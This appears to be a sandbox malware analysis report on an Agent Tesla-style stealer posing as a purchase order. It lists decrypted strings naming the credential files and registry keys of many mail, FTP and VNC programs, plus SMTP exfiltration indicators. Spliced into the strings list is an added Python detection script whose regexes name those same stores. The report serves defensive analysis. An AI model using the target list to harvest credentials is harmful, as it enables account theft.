Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: FTPGetter
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \FTPGetter\servers.xml
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: <server>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: <server_ip>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: <server_ip>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: </server_ip>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: <server_port>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: </server_port>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: <server_user_name>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: <server_user_name>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: </server_user_name>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: <server_user_password>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: <server_user_password>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: </server_user_password>
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: FTPGetter
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: The Bat!
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: appdata
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \The Bat!
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Account.CFN
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Account.CFN
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Becky!
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: DataDir
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Folder.lst
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Mailbox.ini
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Account
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: PassWd
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Account
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SMTPServer
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Account
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: MailAddress
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Becky!
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Outlook
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Email
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: IMAP Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: POP3 Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: HTTP Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SMTP Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Email
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Email
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Email
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: IMAP Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: POP3 Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: HTTP Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SMTP Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Server
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Windows Mail App
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Email
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Server
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SchemaId
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: pResourceElement
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: pIdentityElement
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: pPackageSid
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: pAuthenticatorElement
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: syncpassword
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: mailoutgoing
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: FoxMail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Executable
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: FoxmailPath
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Storage\
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Storage\
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \mail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \mail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Accounts\Account.rec0
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Accounts\Account.rec0
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Account.stg
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Account.stg
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: POP3Host
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SMTPHost
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: IncomingServer
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Account
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: MailAddress
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: POP3Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Opera Mail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: opera:
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: PocoMail
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: appdata
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Pocomail\accounts.ini
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Email
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: POPPass
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SMTPPass
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SMTP
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: eM Client
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: eM Client\accounts.dat
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: eM Client
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Accounts
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: "Username":"
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: "Secret":"
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: "ProviderName":"
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: o6806642kbM7c5
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Mailbird
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SenderIdentities
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Accounts
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Mailbird\Store\Store.db
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Server_Host
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Accounts
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Email
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Username
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: EncryptedPassword
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Mailbird
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: RealVNC 4.x
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: RealVNC 3.x
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SOFTWARE\RealVNC\vncserver
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: RealVNC 4.x
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: RealVNC 3.x
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\ORL\WinVNC3
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: TightVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\TightVNC\Server
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: TightVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\TightVNC\Server
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: PasswordViewOnly
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: TightVNC ControlPassword
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\TightVNC\Server
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ControlPassword
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: TigerVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Software\TigerVNC\Server
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Password
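Read as a whole, the file paths and registry keys in these decrypted strings (FTP and SFTP clients, mail clients, VPN clients, VNC servers) are a ready-made hunt list. A legitimate client opens only its own store; a stealer walks many unrelated families in one burst and also probes stores that are not installed, so the misses are evidence too. The block below is an added example, not part of the Joe Sandbox report: it runs that logic over a Process Monitor CSV export. The regexes are a representative subset lifted from the strings above, the column layout is Procmon's default "Save as CSV", and the rows are constructed for the example rather than captured from a host. The process name on the stealer rows is the sample's own, as in the report's `6.2.PURCHASE ORDER-6350-2024.exe` source label; the PID, user name and session names are made up. Sysmon does not log file reads or registry value reads, which is why this needs Procmon or equivalent EDR telemetry.

```python
"""Hunt for credential-store harvesting in a Process Monitor CSV export.

Added example, not part of the report. The regexes are a representative subset
of the file paths and registry keys in the decrypted strings above; a process
that opens stores of several unrelated products in one burst, including ones
that are absent (Result != SUCCESS), behaves like a stealer, not a client.
The CSV rows below are constructed, not captured from a real host.
"""
import csv
import io
import re
from collections import defaultdict

CREDENTIAL_STORES = {name: re.compile(rx, re.IGNORECASE) for name, rx in {
    "FileZilla": r"\\FileZilla\\recentservers\.xml$",
    "WinSCP":    r"\\Martin Prikryl\\WinSCP 2\\Sessions",
    "CoreFTP":   r"\\FTPWare\\COREFTP\\Sites",
    "FlashFXP":  r"\\FlashFXP\\.*(quick|Sites)\.dat$",
    "WS_FTP":    r"\\Ipswitch\\WS_FTP\\Sites\\ws_ftp\.ini$",
    "TheBat":    r"\\The Bat!\\.*Account\.CFN$",
    "Outlook":   r"\\Profiles\\.*9375CFF0413111d3B88A00104B2A6676",
    "Foxmail":   r"\\Foxmail\\.*\\Account\.(rec0|stg)$",
    "Pocomail":  r"\\Pocomail\\accounts\.ini$",
    "Mailbird":  r"\\Mailbird\\Store\\Store\.db$",
    "ClawsMail": r"\\Claws-mail\\(clawsrc|accountrc|passwordstorerc)$",
    "OpenVPN":   r"\\OpenVPN-GUI\\configs|\\OpenVPN\\config\\",
    "PIA":       r"\\Private Internet Access\\data\\account\.json$",
    "RealVNC":   r"\\(RealVNC\\(WinVNC4|vncserver)|ORL\\WinVNC3)\\Password$",
    "TightVNC":  r"\\TightVNC\\Server\\(Password|PasswordViewOnly|ControlPassword)$",
    "TigerVNC":  r"\\TigerVNC\\Server\\Password$",
    "UltraVNC":  r"\\UltraVNC\\ultravnc\.ini$",
}.items()}

# Procmon operations that show the process opening or reading a store.
READ_OPS = {"CreateFile", "ReadFile", "QueryOpen", "RegOpenKey", "RegQueryValue", "RegEnumKey"}


def classify(path: str):
    """Map a Procmon Path (file or registry) to a store family, or None."""
    for family, pattern in CREDENTIAL_STORES.items():
        if pattern.search(path):
            return family
    return None


def scan_procmon_csv(text: str, threshold: int = 3):
    """Alert on every process that touched >= threshold distinct store families.

    Returns alert dicts ordered by PID, each with the families, the raw
    (operation, path, result) rows, and how many of those probes missed.
    """
    touched = defaultdict(lambda: defaultdict(list))
    for row in csv.DictReader(io.StringIO(text)):
        if row["Operation"] not in READ_OPS:
            continue
        family = classify(row["Path"])
        if family is None:
            continue
        touched[(row["Process Name"], int(row["PID"]))][family].append(
            (row["Operation"], row["Path"], row["Result"]))
    alerts = []
    for (proc, pid), fams in sorted(touched.items(), key=lambda kv: kv[0][1]):
        if len(fams) < threshold:
            continue
        rows = [r for hits in fams.values() for r in hits]
        alerts.append({"process": proc, "pid": pid, "families": sorted(fams),
                       "rows": rows,
                       "probes_missing": sum(1 for _, _, res in rows if res != "SUCCESS")})
    return alerts


# Constructed Procmon "Save as CSV" export (default columns); not real telemetry.
SAMPLE_PROCMON_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1234567 AM","filezilla.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Roaming\\FileZilla\\recentservers.xml","SUCCESS","Desired Access: Generic Read"
"10:03:15.0000001 AM","PURCHASE ORDER-6350-2024.exe","6028","CreateFile","C:\\Users\\alice\\AppData\\Roaming\\FileZilla\\recentservers.xml","SUCCESS","Desired Access: Generic Read"
"10:03:15.0000002 AM","PURCHASE ORDER-6350-2024.exe","6028","RegOpenKey","HKCU\\Software\\Martin Prikryl\\WinSCP 2\\Sessions","SUCCESS","Desired Access: Read"
"10:03:15.0000003 AM","PURCHASE ORDER-6350-2024.exe","6028","RegQueryValue","HKCU\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\prod@sftp.example.test\\Password","SUCCESS","Type: REG_SZ, Length: 202"
"10:03:15.0000004 AM","PURCHASE ORDER-6350-2024.exe","6028","RegOpenKey","HKCU\\Software\\FTPWare\\COREFTP\\Sites","NAME NOT FOUND","Desired Access: Read"
"10:03:15.0000005 AM","PURCHASE ORDER-6350-2024.exe","6028","CreateFile","C:\\Users\\alice\\AppData\\Roaming\\Pocomail\\accounts.ini","NAME NOT FOUND","Desired Access: Generic Read"
"10:03:15.0000006 AM","PURCHASE ORDER-6350-2024.exe","6028","RegQueryValue","HKCU\\Software\\TightVNC\\Server\\Password","NAME NOT FOUND","Length: 144"
"10:03:16.0000000 AM","explorer.exe","1204","CreateFile","C:\\Users\\alice\\Documents\\report.docx","SUCCESS","Desired Access: Read Attributes"
'''

if __name__ == "__main__":
    for a in scan_procmon_csv(SAMPLE_PROCMON_CSV):
        print(f"{a['process']} (pid {a['pid']}): {len(a['families'])} store families "
              f"({', '.join(a['families'])}); {a['probes_missing']} probes of absent stores")
```

On the constructed rows, filezilla.exe touches one family and is ignored, while the sample's process touches five in the same second and three of those stores do not even exist on the host. A threshold of three keeps password managers and backup agents that legitimately read two or three stores out of the alert; tune it per estate, and treat "probes_missing" above zero as the stronger signal, since no client reads a store it did not create.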
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ProgramFiles(x86)
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: passwd
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ProgramFiles(x86)
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: passwd2
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ProgramFiles
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: passwd
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ProgramFiles
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: passwd2
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ProgramFiles
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: passwd
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ProgramFiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: JDownloader 2.0
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Paltalk
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: nickname
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: NnLj.pdbSHA256 source: PURCHASE ORDER-6350-2024.exe
                        Source: Binary string: NnLj.pdb source: PURCHASE ORDER-6350-2024.exe

                        Networking

                        Source: Network traffic | Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Network traffic | Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Network traffic | Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: global traffic | TCP traffic: 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: Joe Sandbox View | IP Address: 199.79.62.115 199.79.62.115
                        Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                        Source: global traffic | TCP traffic: 192.168.2.5:49707 -> 199.79.62.115:587
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global traffic | DNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2051720668.0000000002A21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                        System Summary

                        Source: initial sample | Static PE information: Filename: PURCHASE ORDER-6350-2024.exe
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_010EF044
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DD3A50
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DDD3D4
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DD1340
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06E1E7C3
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06E1F038
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06E1EC00
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06E1EBFF
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 6_2_01364140
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 6_2_01364D58
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 6_2_01364488
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 6_2_067235F8
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 6_2_067219A0
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2059322242.00000000088B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000000.2022902908.000000000071C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNnLj.exeL vs PURCHASE ORDER-6350-2024.exe
